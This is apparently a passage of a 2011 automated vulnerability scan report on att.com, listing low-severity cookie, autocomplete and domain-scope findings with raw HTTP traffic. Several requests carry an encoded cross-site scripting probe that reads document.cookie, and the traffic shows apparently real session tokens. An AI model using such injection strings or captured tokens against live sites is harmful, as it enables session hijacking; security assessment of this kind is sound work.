Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

3.3. https://www.att.com/olam/logout.olamexecute  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/logout.olamexecute

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/logout.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; EDOCSSESSIONID=tYgVN4nK1nfNdRJZhy0ypsrD9ygDfXD1ySTF2yVvkQR5PmZBwTtL!-744530585; colam_ctn=l%3Den_US; TLTHID=83E4A0D271261071AF049E552188C3F4; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FloginAction.olamexecuted4776%5C%22%3E%3Cimg%20src%3Da%20onerror%3Dalert(document.cookie)%3E308930536fd%22%2C%22pv%22%3A5%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%2C%22e%22%3A2%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:39:47 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A313761C71271071C2539E552188C3F4; path=/; domain=.att.com
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: EDOCSSESSIONID=h0BxN4pDq3BVSNCXR6bvvmwLZFpCpyHGBPHnzkcykGGYhNS2ycG9!-744530585; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Content-Length: 57599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

3.4. https://www.att.com/olam/registrationAction.olamexecute  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/registrationAction.olamexecute

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /olam/registrationAction.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:17 GMT
Connection: keep-alive
Set-Cookie: TLTHID=54B4862A712510717B51952E259E14A2; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=1Xg6N4lFf66p8RzjmLVH6cygD59mH6qmpXs0hM6Jx6LyFSZH2Llj!2022867730; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:17 GMT; path=/
Set-Cookie: stack=p1eam1m6; path=/
Content-Length: 31527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

3.5. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 530
Content-Type: text/html; charset=UTF-8
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:42 GMT
Connection: keep-alive
Set-Cookie: TLTHID=638F77867125107191D59E552188C3F4; path=/; domain=.att.com


<html>
   <body>
       <form name="myForm">
        <input type="hidden" name="userid" size="20" />
        <input type="hidden" name="passwor
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. https://www.att.com/olam/loginAction.olamexecute  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /olam/loginAction.olamexecute?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:12 GMT
Connection: keep-alive
Set-Cookie: TLTHID=51FED87C712510718C76EED8C4C046B3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=bcTFN4lQG1bh6jxwQH9J6WbgCPbbSR0clw6DkTqhl10gs7wvmsw1!725500378; path=/
Set-Cookie: stack=doammw31; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:12 GMT; path=/
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
</script>


       <form name="loginActionForm" action="/olam/loginAction.doview" method="post" onSubmit="return checkValue(this)">
   

<script type="text/javascript" src="/olam/jsp/profile/imageupload/BrowserDetect.js">
...[SNIP]...
<div id="showPassForInternetHomePhone"><input type="password" name="password" size="21" style="vertical-align:middle"/><br/>
...[SNIP]...
<div id="doNotShowRegPass">    <input type="password" name="pass" size="21" value="" style="vertical-align:middle"><br/>
...[SNIP]...

4.2. https://www.att.com/olam/logout.olamexecute  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/logout.olamexecute

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /olam/logout.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; EDOCSSESSIONID=tYgVN4nK1nfNdRJZhy0ypsrD9ygDfXD1ySTF2yVvkQR5PmZBwTtL!-744530585; colam_ctn=l%3Den_US; TLTHID=83E4A0D271261071AF049E552188C3F4; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FloginAction.olamexecuted4776%5C%22%3E%3Cimg%20src%3Da%20onerror%3Dalert(document.cookie)%3E308930536fd%22%2C%22pv%22%3A5%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%2C%22e%22%3A2%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:39:47 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A313761C71271071C2539E552188C3F4; path=/; domain=.att.com
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: EDOCSSESSIONID=h0BxN4pDq3BVSNCXR6bvvmwLZFpCpyHGBPHnzkcykGGYhNS2ycG9!-744530585; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Content-Length: 57599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
</script>


       <form name="loginActionForm" action="/olam/loginAction.doview" method="post" onSubmit="return checkValue(this)">
   

<script type="text/javascript" src="/olam/jsp/profile/imageupload/BrowserDetect.js">
...[SNIP]...
<div id="showPassForInternetHomePhone"><input type="password" name="password" size="21" style="vertical-align:middle"/><br/>
...[SNIP]...
<div id="doNotShowRegPass">    <input type="password" name="pass" size="21" value="" style="vertical-align:middle"><br/>
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 5 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. https://www.att.com/olam/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/a

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olam/a HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecuted4776%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E308930536fd?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FregistrationAction.olamexecute%22%2C%22pv%22%3A4%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D; TLTHID=5893ADCE7126107198F1EED8C4C046B3; EDOCSSESSIONID=2FJ8N4nZNcBJz7zWkb4nGfTymqd6f1GdMLvSJZDxbFZfFfGDYwgC!725500378

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9030
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:32:35 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A131519471261071B26E9E552188C3F4; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=FpjQN4nSSybv1Q21ZYL8TllH8fYsVJMhyvdqT5GBTPFnj1wBLXGC!-744530585; path=/

